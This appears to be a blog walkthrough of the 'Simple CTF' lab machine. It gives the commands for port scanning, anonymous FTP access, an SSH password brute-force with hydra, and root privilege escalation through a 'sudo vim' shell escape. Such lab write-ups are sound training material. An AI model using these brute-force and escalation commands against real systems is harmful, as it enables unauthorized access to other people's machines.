Simple CTF

Use nmap to check for open ports: sudo nmap -Pn -p- -sS


21/tcp open ftp

80/tcp open http

2222/tcp open EtherNetIP-1

Log on to the ftp server as anonymous: ftp

cd pub directory and get ForMitch.txt

cat file:

 ℹ️ Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess! 

🔑 mitch could be a potential user name

Bruteforce the ssh server: hydra -l mitch -P /usr/share/dirb/wordlists/others/best110.txt ssh://

 *2222][ssh] host:   login: mitch   password: ******

Login to the ssh server: ssh mitch@ -p 2222

🏴‍☠️ cat user.txt to get the first flag

sudo -l:

ℹ️ (root) NOPASSWD: /usr/bin/vim 

Head to to find shell access:

vim -c ':!/bin/sh'

sudo vim -c ‘:!/bin/sh’

root access is gained

cd to root directory

🏴‍☠️ cat root.txt for the final flag

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s